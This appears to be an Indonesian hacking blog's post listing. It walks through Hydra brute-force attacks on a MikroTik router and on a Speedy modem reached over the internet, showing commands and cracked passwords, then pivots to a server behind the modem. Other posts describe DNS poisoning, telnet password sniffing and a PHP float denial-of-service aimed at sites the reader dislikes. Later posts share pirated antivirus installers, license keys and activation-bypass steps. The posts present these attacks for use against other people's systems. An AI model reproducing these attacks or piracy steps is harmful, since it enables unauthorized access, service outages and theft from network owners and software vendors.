Hacking Password Mikrotik - Part 2

Percobaan penulis melakukan serangan BF (brute force) pada http, telnet dan ssh mengalami kegagalan, setelah termenung sekian lama ahkirnya penulis ingat serangan BF pada FTP di waktu sebelumnya, ahkirnya penulis mencoba melakukan BF pada FTP dan hasilnya ternyata sukses. Hmm username dan password untuk http, telnet, ssh, telnet adalah sama, satu celah kena maka semua kena, jadi?
Dari sisi kompatibilitas mikrotik dapat diancungi jempol tapi akibat dari banyaknya kompatibilitas yang ada dapat membawa ancaman lebih besar, seperti pada telnet yang penulis bahas dan praktek diartikel yang sebelumnya.
Oke, kita langsung praktek saja, kita periksa port yang terbuka di mikrotik
C:\Documents and Settings\serverdata>nmap -A 192.168.1.174
Starting Nmap 5.21 ( http://nmap.org ) at 2011-11-07 15:36 Pacific Standard Time
Nmap scan report for 192.168.1.174
Host is up (0.00013s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp MikroTik router ftpd 3.20
22/tcp open ssh OpenSSH 2.3.0 mikrotik 2.9 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 1024 c6:5e:04:d3:12:db:1d:98:c9:17:e2:98:77:d4:39:ba (RSA1)
|_1024 76:68:bc:ee:e3:40:f5:6b:72:ea:44:55:df:86:06:ec (DSA)
23/tcp open telnet Linux telnetd
80/tcp open http MikroTik router http config
|_html-title: mikrotik routeros > administration
2000/tcp open winbox MikroTik WinBox management console
8080/tcp open http-proxy Mikrotik http proxy
8291/tcp open unknown
MAC Address: 08:00:27:22:84:F1 (Cadmus Computer Systems)
Device type: media device
Running: Chumby embedded
OS details: Chumby Internet radio
Network Distance: 1 hop
Service Info: OS: Linux; Device: router
HOP RTT ADDRESS
1 0.13 ms 192.168.1.174
OS and Service detection performed. Please report any incorrect results at http:
//nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.00 seconds
Ternyata banyak port dan service yang terbuka di mikrotik.
Oke tidak perlu berpanjang-panjang lebar lagi, kita langsung hack saja mikrotik target.
C:\Documents and Settings\serverdata>
H:\hydra>hydra -l admin -P kamus.txt 192.168.1.174 ftp
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-11-07 14:39:20
[DATA] 16 tasks, 1 servers, 23 login tries (l:1/p:23), ~1 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.174 login: admin password: jagoan
[STATUS] attack finished for 192.168.1.174 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2011-11-07 14:39:26
Binggo, password mikrotik sudah didapat, kita coba masuk lewat web.

Menghajar para pengguna jaringan di mikrotik dengan mengarahkan DNS Servernya ke DNS Server milik kita, ya samalah tekniknya dengan teknik di artikel sebelumnya yang penulis tulis untuk poisoning DNS para pengguna yang menggunakan DHCP router.

Terbatas di web, pakai winbox saja dan login pakai pakai password yang kita hack dari FTP sebelumnya biar lebih banyak option lagi, jika ingin mengganti password router password mikrotik di winbox maka contohnya klik saja password dan muncul form input untuk password lama dan password baru.

sekian dulu, cayooo . . . .
Baca Selengkapnya ....
Hacking Password Modem/Router Speedy

Disini penulis menggunakan tool Hydra. Hydra adalah tool untuk melakukan hacking password dengan menggunakan metode brute force, dengan anda memiliki kamus kata yang banyak yang dimungkinkan passwordnya ada di dalam kamus tersebut.
Di sini penulis contohkan misal kita join ke mIRC, kita contohkan saja nick ce_imutbgtt, nah whois aja itu nick dan kita akan mendapatkan IPnya.
Tampilan IP setelah di whois.


Jika anda ingin terus maju maka anda dapat menggunakan teknik brute force. Contohnya untuk melakukan exploitasi dengan hydra adalah
H:\hydra>hydra -m / -l admin -P data.txt 180.254.70.135 http-get
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-10-17 14:27:56
[DATA] 11 tasks, 1 servers, 11 login tries (l:1/p:11), ~1 tries per task
[DATA] attacking service http-get on port 80
[STATUS] attack finished for 180.254.70.135 (waiting for childs to finish)
[80][www] host: 180.254.70.135 login: admin password: baseball
Hydra (http://www.thc.org) finished at 2011-10-17 14:27:57
H:\hydra>
Setelah kita masuk ke router dengan password yang didapat, jika kita ingin melakukan hacking server di belakang router maka kita dapat melakukan IP Forwarding dari router ke Server yang berada dibelakang router.

Disini kita tidak tahu IP-IP lokal berapa saja dibelakang router, karena itu kita dapat mengujinya satu persatu dengan melakukan ping walaupun tidak jaminan.
Disini diasumsikan IP Servernya adalah 192.168.1.2 setelah kita ping dapat.
D:\>ping 180.254.70.135
Pinging 180.254.70.135 with 32 bytes of data:
Reply from 180.254.70.135: bytes=32 time<1ms TTL=254
Reply from 180.254.70.135: bytes=32 time=2ms TTL=254
Reply from 180.254.70.135: bytes=32 time=11ms TTL=254
Reply from 180.254.70.135: bytes=32 time<1ms TTL=254
Setelah diping jalan maka kita dapat mencoba melakukan scanning dengan NMAP
C:\>nmap -v -A 180.254.70.135
Starting Nmap 5.21 ( http://nmap.org ) at 2011-10-17 15:28 Pacific Daylight Time
NSE: Loaded 36 scripts for scanning.
Initiating Ping Scan at 15:28
Scanning 180.254.70.135 [4 ports]
Completed Ping Scan at 15:28, 0.53s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:28
Completed Parallel DNS resolution of 1 host. at 15:28, 3.09s elapsed
Initiating SYN Stealth Scan at 15:28
Scanning 180.254.70.135 [1000 ports]
Discovered open port 23/tcp on 180.254.70.135
Discovered open port 80/tcp on 180.254.70.135
Discovered open port 3389/tcp on 180.254.70.135
Discovered open port 21/tcp on 180.254.70.135
Completed SYN Stealth Scan at 15:28, 2.34s elapsed (1000 total ports)
Disini dari scanning dengan NMAP kita mendapatkan adanya port 23 yaitu port untuk telnet server. Dengan aktifnya Telnet Server maka kita dapat melakukan brute force ke server Telnet dengan Hydra.
H:\hydra>hydra -l administrator -P data.txt 180.254.70.135 telnet
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-10-17 15:21:22
[DATA] 6 tasks, 1 servers, 6 login tries (l:1/p:6), ~1 tries per task
[DATA] attacking service telnet on port 23
[STATUS] attack finished for 180.254.70.135 (waiting for childs to finish)
[23][telnet] host: 180.254.70.135 login: administrator password: sepakbola
Hydra (http://www.thc.org) finished at 2011-10-17 15:21:26
Binggo, kita mendapatkan password telnetnya.
Masukkan login dan passwordnya dan kita akan mendapatkan shell dari telnet server. Contohnya :
Setelah kita klik Open. Masukkan login dan passwordnya.
Sip, kita masuk ke shell server.
Untuk download Hydra. http://0xa.li/files/hydra-6.0-windows.zip. Untuk cari kamusnya untuk brute force dapat dicari sendiri di google, jika ingin buat sendiri juga boleh. Cayooo!
Solusi : Pengamanannya jika anda ingin tetap dapat dipanggil router speedynya dari luar, maka anda dapat membuat password yang susah ditebak dengan berbagai kombinasi huruf dan angka yang kompleks tapi tetap mudah diingat. Jika ingin lebih aman lagi ya tidak perlu membuat router speedy bisa diakses dari internet, caranya misal dengan melempar port 80 ke IP lain yang kosong atau tidak dipakai.
Saya tidak bertanggung sama sekali atas semua hal-hal yang diakibatkan oleh artikel ini.
Baca Selengkapnya ....
Hacking password mikrotik - part 1
Penggunaan telnet pada mikrotik dapat mengakibatkan password mikrotik di sniffing.
Contoh yang penulis lakukan dalam melakukan sniffing password telnet dengan CAIN.
Setelah penulis melakukan poisoning pada IP router mikrotik dan kemudian si administrator melakukan login ke mikrotik melalui telnet, penulis cukup masuk pada bagian passwords lalu telnet akan tampil baris seperti dibawah ini lalu penulis lakukan klik kanan lalu view.


Solusi : Untuk mencegah terjadinya tindakan pengambilan password dengan menggunakan sniffing maka gunakan SSH untuk remote secara console.
Cayoo . . . .
Baca Selengkapnya ....
SOCKS5

Okay, I just made a PoC library on how to perform SOCKS5 connection(s) in both C# and VB.Net. Here's a code example of how to use it (in VB.Net):
Imports SOCKS5
Public Class PoC
Public Sub Main()
Dim Target As String = "www.google.com"
Dim Query As String = _
"GET / HTTP/1.1" & vbCrLf & _
"Host: " & Target & vbCrLf &; vbCrLf
Dim Tunnel As New SOCKS5("1.2.3.4", 1080, Target, 80)
Dim Socket As New Net.Sockets.Socket( _
Net.Sockets.AddressFamily.InterNetwork, _
Net.Sockets.SocketType.Stream, _
Net.Sockets.ProtocolType.Tcp)
Tunnel.Connect(Socket)
Socket.Send(Text.Encoding.ASCII.GetBytes(Query))
'...
End Sub
End Class
I hope you'll get some use out of it!
Also, here's the download link: SOCKS5.rar
Description: Allows you to tunnel your streams or sockets through a SOCKS5 server in .NET.
Version: 1.0
Reference(s): RFC1928
Language: VB.Net/C#, Requires .Net Framework 3.5
good luck . . . :)
Baca Selengkapnya ....
PHP Float DoS <= 5.3.X
If the PHP interpreter tries to parses a specific number, the fork/thread (?) simply hangs and starts consuming CPU resources.
The original advisory states the following snippet:
---------------------------
-------------------------

---------------------------
------------------------The exploit is self explaining, all you have to do is to find a numeric variable on a site you're pissed enough at. Eg:
http://website.com/index.php?id=7
Replace the id variable with 2.2250738585072011e-308 and watch your success when the server doesn't respond with a page.
This doesn't kill the server - but it do consume alot of CPU resources.
Your best approach is to send several requests (code something will you?) which sends either HTTP POST or GET requests towards the server.
It surely wont take long before it goes down completely.
Here's a PoC script using several variations of the evil floating-point:
-----------------------
--------------------------------

----------------------------
-----------------------------That's it! Update your PHP installation (if you haven't already) :)
Baca Selengkapnya ....
Avira Antivirus Premium 2012 12.0.0.871 Final Incl Keys
In a user-defined installation or a modification installation, the following installation modules can be selected,
AntiVir Premium
This module contains all components required for successful installation of Avira AntiVir Premium.
AntiVir Guard
The AntiVir Guard runs in the background. It monitors and repairs, where necessary, files during operations such as open, write and copy in on-access mode. Whenever a user carries out a file operation (e.g. load document, execute, copy), Avira AntiVir Premium automatically scans
AntiVir MailGuard
MailGuard is the interface between your computer and the email server from which your email program (mail client) downloads the emails. MailGuard is connected as a so-called proxy between the
AntiVir WebGuard
When surfing the internet, you are using your web browser to request data from a web server. The data transferred from the web server (HTML files, script and image files, Flash files, video and music streams, etc) will normally be moved directly into the browser cache for display in the web browser, meaning that an on-access scan as performed by AntiVir Guard is not possible. This could allow viruses and unwanted programs to access your
Rootkit Detection
The Rootkit Detection checks whether
Shell Extension
The Avira AntiVir Premium Shell Extension generates an entry Scan selected files with AntiVir in the context menu of the Windows Explorer (right-hand mouse button). With this entry you can directly scan files or directories.
Here are some key features of "Avira Antivirus Premium 2012":
· AntiVir stops all types of viruses
· AntiAd/Spyware eliminates ad/spyware
· AntiPhishing proactive protection against phising
· AntiRootkit against hidden rootkit threats
· AntiDrive-by prevents against downloading viruses when surfing
· EmailScanner enhanced email protection
· WebGuard protection against malicious websites
· RescueSystem create a bootable rescue CD
· QuickRemoval eliminate viruses at the push of a button
· NetbookSupport for laptops with low resolution
Requirements:
· At least 100 MB of free hard disk memory space (more if using Quarantine for temporary storage)
· At least 192 MB RAM under Windows 2000/XP
· At least 512 MB RAM under Windows Vista
· For all installations:
· Administrator rights are required for the installation
What's New in This Release:
New Gui:
· Avira AntiVir, version 10 will be released with a new graphical user interface that features a completely new set of icons as well as a new 3D navigation bar and a continuous background picture.
· The new user interface keeps the proven elements of the old interface and the customer does not need to get into a new interface. However, the new icon set and the other new elements make it much easier for the customer to find his way around the program.
Avira AntiVir ProActiv :
· Avira AntiVir, version 10 is now equipped with a brand new host-based intrusion prevention system called Avira AntiVir ProActiv. AntiVir ProActiv constantly monitors the behaviour of the system in real-time and looks for unusual events.
· An integrated rule-system is able to decide proactively if a certain event (or a combination of events) indicates that the system is currently under attack from a new or unknown malware.
Code:
http://www.wupload.com/file/415063943/avira.antivirus.premium.12.0.0.871.rar
Code:
http://www.filesonic.com/file/2569961851/avira.antivirus.premium.12.0.0.871.rar
Baca Selengkapnya ....
Nod32/Eset Smart Security Keys | Daily Updates 01.07.2011
FileSonic :
http://www.filesonic.com/file/1343242624
Baca Selengkapnya ....
Kaspersky KIS/KAV/WS 2011 NEW Keys 1 JULY 2011(All in One Keys)
How to activate Kaspersky license using a key file :
1. Open Kaspersky License Manager (from lower right corner).
2. Click ‘Activate the application with a new license’ button. (Delete any trial key first, by clicking the red X next to the key).
3. Disable your internet connection (either disable Network adapter from control panel or turn off your modem/router).
4. Select ‘Activate commercial version’ and enter the activation license code as 11111-11111-11111-1111X
or select ‘Activate trial license’.
5. Click Next, an error dialog box will open as shown below:
6. Click Ok and you will now get the option to activate kaspersky using a key file.
7. Browse to the key location and activate kaspersky.
Try Kis11 or Kav11 Keys For KASPERSKY 2012 version.
FileSonic :
http://www.filesonic.com/file/1343244244
Baca Selengkapnya ....
Kaspersky KIS/KAV/WS 2011 NEW KEYS 20 JUNE 2011
Try Kis11 or Kav11 Keys For KASPERSKY 2012 version.
How to activate Kaspersky license using a key file :
1. Open Kaspersky License Manager (from lower right corner).
2. Click ‘Activate the application with a new license’ button. (Delete any trial key first, by clicking the red X next to the key).
3. Disable your internet connection (either disable Network adapter from control panel or turn off your modem/router).
4. Select ‘Activate commercial version’ and enter the activation license code as 11111-11111-11111-1111X
or select ‘Activate trial license’.
5. Click Next, an error dialog box will open as shown below:
6. Click Ok and you will now get the option to activate kaspersky using a key file.
7. Browse to the key location and activate kaspersky.
http://www.filesonic.com/file/1265398394
Baca Selengkapnya ....
Trustport Antivirus 2011 11.0.0.4565
Size: 169 MB / Windows 2K / XP / 2003 / Vista / Win 7
http://www.filesonic.com/file/1042555951/TrustPort_Antivirus_11.0.0.4565.exe.001
http://www.filesonic.com/file/1042558571/TrustPort_Antivirus_11.0.0.4565.exe.002
Baca Selengkapnya ....
eScan Anti-Virus 11.0.1139.828
eScan Anti-Virus 11 - is a complete solution for protection against malicious software and data security. eScan 1911 protects computers from viruses (including zero-day threats), unwanted and inappropriate Internet content, as well as other security threats including spyware, adware, keyloggers, rootkits, botnets, hacker attacks, spam and phishing . To ensure complete protection of your computer. program uses advanced technologies such as MWL, DIRC and NILP and sophisticated heuristic algorithms.
Main features of eScan Anti-Virus 11:
. Modern and simple user interface
. The best protection without slowing down the speed of your computer
. Effective protection in real time all the folders and files on your computer
. Lock the alerts and warnings during the computer game
. Stop memory-intensive processes for laptops
. Integrated protection from all network attacks
. Protect files and folders from changing or removing
. Removing rootkits and virus-infected files that can not be cleaned in the normal mode of Windows
. Automatically check for and download critical updates for Windows operating system from Microsoft
. Automatically provides compressed in accordance with the network bandwidth virus database updates
http://www.fileserve.com/file/AXYtSfS/eScan_Anti-Virus_11.0.1139.828.rar
Baca Selengkapnya ....
AVG Anti-Virus Pro 2011
Anti-Virus 2011 - New version of famous anti-virus program from Czech developer to protect your PC from dangerous objects and network threats. Program blocks viruses, trojans, worms, spyware, and a module to deal with rootkits helps get rid of the malicious processes, masking the virus. Compatible with Windows Vista and Windows 7.
AVG - popular anti-virus software for home use. Guaranteed by the manufacturer of rapid virus database updates, ease of use, low system requirements - the main advantages of the products AVG. AVG anti-virus software provides powerful protection against viruses and spyware in Windows 7, Vista and XP. AVG products are designed to combat the threat of infecting your computer and data loss.
Anti-Virus 2011 includes the following modules:
* Antivirus and Anti-Spyware: protection against viruses, worms, spyware and trojans
* Anti-Rootkit: protection against hidden threats, spreading malicious content
* Identity Protection: Protection against new and unknown threats
* LinkScanner Search-Shield: mapping of security assessments in real time for all the search results of search services, Google, Yahoo and MSN / Live
* LinkScanner Active Surf-Shield: Protection in real time from infected web pages during the Internet
* Web Shield: Checking the downloaded files and protection from accidental contamination of instant messaging
AVG Anti-Virus 2011 scans in real time:
* All files including documents, photos, music and applications
* E-mail (it supports all popular email programs)
* Instant messaging and P2P communications
* Files and online transactions such as shopping and banking
* Search results and any other web-links
Advantages of products AVG:
* The necessary level of protection
* Our specialists are always looking for new challenges, so we can quickly develop new ways of protection.
* AVG products protect more than 80 million PC users around the world.
* Easy to use security
* AVG products are easy to download, install and use, have minimal impact on system performance.
* Technology, the award-winning
* AVG security system certified by all major independent certification companies, such as the ICSA, Virus Bulletin, Checkmark (Lab West Coast Labs).
http://www.rapidshare.com/files/1634581337/AVG_AV_10.0_Build_1188a3311_x86.rar
Fileserve :
http://www.fileserve.com/file/uxXvuqV/AVG_AV_10.0_Build_1188a3311_x86.rar
Filesonic :
http://www.filesonic.com/file/1165166191/AVG_AV_10.0_Build_1188a3311_x86.rar
Baca Selengkapnya ....
Kaspersky Anti-Virus 2011 11.0.2.556
Kaspersky Anti-Virus 2011 - a solution for the base to protect your computer from malicious software. It protects you in real time from the major information-threats - both known and new.
Features:
Protection from viruses and spyware in real time
Check the Web sites and programs for malicious code
Reliable protection of personal data
Search for vulnerabilities in installed programs
A convenient desktop gadget
Minimal impact on computer
http://www.rapidshare.com/files/2755520054/Kaspersky.Anti-Virus.2011.rar
Fileserve :
http://www.fileserve.com/file/utrhfnB/Kaspersky.Anti-Virus.2011.rar
Filesonic :
http://www.filesonic.com/file/1165166361/Kaspersky.Anti-Virus.2011.rar
Baca Selengkapnya ....
Nod32/Eset Smart Security Keys | Daily Updates 14.06.2011
Keys for (14.06.2011):
http://www.filesonic.com/file/1216950204
Baca Selengkapnya ....
ESET NOD32 Antivirus & Smart Security 5.0.84.0 RC
ESET NOD32 Antivirus - Provides a reliable, advanced protection against threats endangering your PC. Viruses, worms, Trojans and other trouble now can not cause any harm to information valuable to you. Advanced detection methods that are used in this program, even provide protection against future threats, which are new worms and viruses. ESET NOD32 Antivirus is based on the popular technology ThreatSense. The system allows you to proactively identify and render more viruses, spyware, adware, phishing attacks, rootkits and other Internet threats than any other program.
The difference of Home Business:
* ESET NOD32 Antivirus Business Edition can be installed on servers as well as workstations (Home Edition can only be installed on workstations)
* Business version also able to create a mirror for updates on the network. This is the file *. lic, which is added to the business of setting up a package. After adding a file to update settings tab appears Mirror. To work as requested ESET Remote Administrator. Business is designed for offices with 5 or more companies.
The upcoming release of ESET’s flagship product, ESET Smart Security 5 enters the beta phase of development. Be among the first users who take the test drive and install comprehensive protection which safeguards your laptop or PC from all types of malware, hacker attacks and e-mail threats.
New Features for Geeks
Gamer Mode
When in full-screen mode, ESET Smart Security 5 automatically switches to silent mode, which saves system resources, so you can enjoy playing computer games or concentrate on important work tasks without distractions from pop-up messages.
Advanced HIPS Functionality
This one is for real Geeks – now you can customize the behavior of the system in greater detail: specify rules for the system registry, active processes and programs, and fine-tune your security posture.
Advanced Setup Tree
Redesigned advanced setup tree for more intuitive and easier navigation.
http://www.filesonic.com/file/1224185571/eav_nt32_enu.rar -->> 32Bit
http://www.filesonic.com/file/1224185591/eav_nt64_enu.rar -->> 64Bit
Filesoni ( Eset Smart Security )
http://www.filesonic.com/file/1224184811/ess_nt32_enu.rar -->> 32Bit
http://www.filesonic.com/file/1224185581/ess_nt64_enu.rar -->> 64Bit
Baca Selengkapnya ....
Kaspersky KIS/KAV/WS 2011 NEW KEYS [20.05.2011]
How to Active :
Activate your kaspersky with key file
1. Disable/Unplug your internet connection.
2. Click for trial version or enter this Bad code
3. Kaspersky will show you an error.
4. A new window will appear with key file browsing option.
5. Select your key from browsing window.
NEW KEYS for KIS/KAV [2011/2010/2009/2008] - 20 May, 2011
http://www.filesonic.com/file/1041645024
MediaFire :
http://www.mediafire.com/?9d9xds7nuc6j17t
Baca Selengkapnya ....
Eset Nod32 Serial Key ( 20.05.2011 )
Click on update in ESET if user-name and password is invalid then it will ask for it again. Then just copy paste user-name and password given below . . .
http://www.mediafire.com/?uevy32nprm998no
Pass : monyet-nyasar
Baca Selengkapnya ....
Kaspersky KIS KAV Keys (19.05.2011)
ACTIVATE
1- Disable your internet connection
2- Delete previous license
3- Activate using the including code in the folder (you must be disconnected from the internet)
the kaspersky will inform you that it can't verify the license and asks you to Browse for an existing license from your folders
4- Navigate to the licenses folder & use a working one
5- Update Kaspersky database
UPDATE
Activating Kaspersky 2011 license using key file:
1. Open Kaspersky 2011 License Manager (from lower right corner).
2. Click ‘Activate the application with a new license’ button. (Delete any trial key first if you want, by clicking the red X next to the key).
3. Select ‘Activate commercial version’ and enter the activation license code as 11111-11111-11111-1111X
4. Click Next, an error dialog box will open saying ‘wrong activation code’ as shown:
5. Click Ok and you will then get the option to activate kaspersky using a key file.
6. Browse to the key location on your computer and activate kaspersky.
KEYS
*Kaspersky Anti-Virus 5
*Kaspersky Anti-Virus 6
*Kaspersky Anti-Virus 7
*Kaspersky Anti-Virus 8
*Kaspersky Anti-Virus 2010
*Kaspersky Anti-Virus 2011
*Kaspersky Anti-Virus for WKS & FS
*Kaspersky OpenSpace Security
*Kaspersky Personal Security Suite 2.0
*Kaspersky Internet Gateway
*Kaspersky Internet Security 6
*Kaspersky Internet Security 7
*Kaspersky Internet Security 8
*Kaspersky Internet Security 2010
*Kaspersky Internet Security 2011
http://www.mediafire.com/?q81gyex4oame7be
Baca Selengkapnya ....
Kaspersky KIS KAV Keys (18.05.2011)
ACTIVATE
1- Disable your internet connection
2- Delete previous license
3- Activate using the including code in the folder (you must be disconnected from the internet)
the kaspersky will inform you that it can't verify the license and asks you to Browse for an existing license from your folders
4- Navigate to the licenses folder & use a working one
5- Update Kaspersky database
UPDATE
Activating Kaspersky 2011 license using key file:
1. Open Kaspersky 2011 License Manager (from lower right corner).
2. Click ‘Activate the application with a new license’ button. (Delete any trial key first if you want, by clicking the red X next to the key).
3. Select ‘Activate commercial version’ and enter the activation license code as 11111-11111-11111-1111X
4. Click Next, an error dialog box will open saying ‘wrong activation code’ as shown:
5. Click Ok and you will then get the option to activate kaspersky using a key file.
6. Browse to the key location on your computer and activate kaspersky.
KEYS
*Kaspersky Anti-Virus 5
*Kaspersky Anti-Virus 6
*Kaspersky Anti-Virus 7
*Kaspersky Anti-Virus 8
*Kaspersky Anti-Virus 2010
*Kaspersky Anti-Virus 2011
*Kaspersky Anti-Virus for WKS & FS
*Kaspersky OpenSpace Security
*Kaspersky Personal Security Suite 2.0
*Kaspersky Internet Gateway
*Kaspersky Internet Security 6
*Kaspersky Internet Security 7
*Kaspersky Internet Security 8
*Kaspersky Internet Security 2010
*Kaspersky Internet Security 2011
FileServe :
http://www.fileserve.com/file/aMdefTt/18.05.2011.KAV.KIS.by.im4aLL.rar
FileSonic :
http://www.filesonic.com/file/1021332834/18.05.2011.KAV.KIS.by.im4aLL.rar
Baca Selengkapnya ....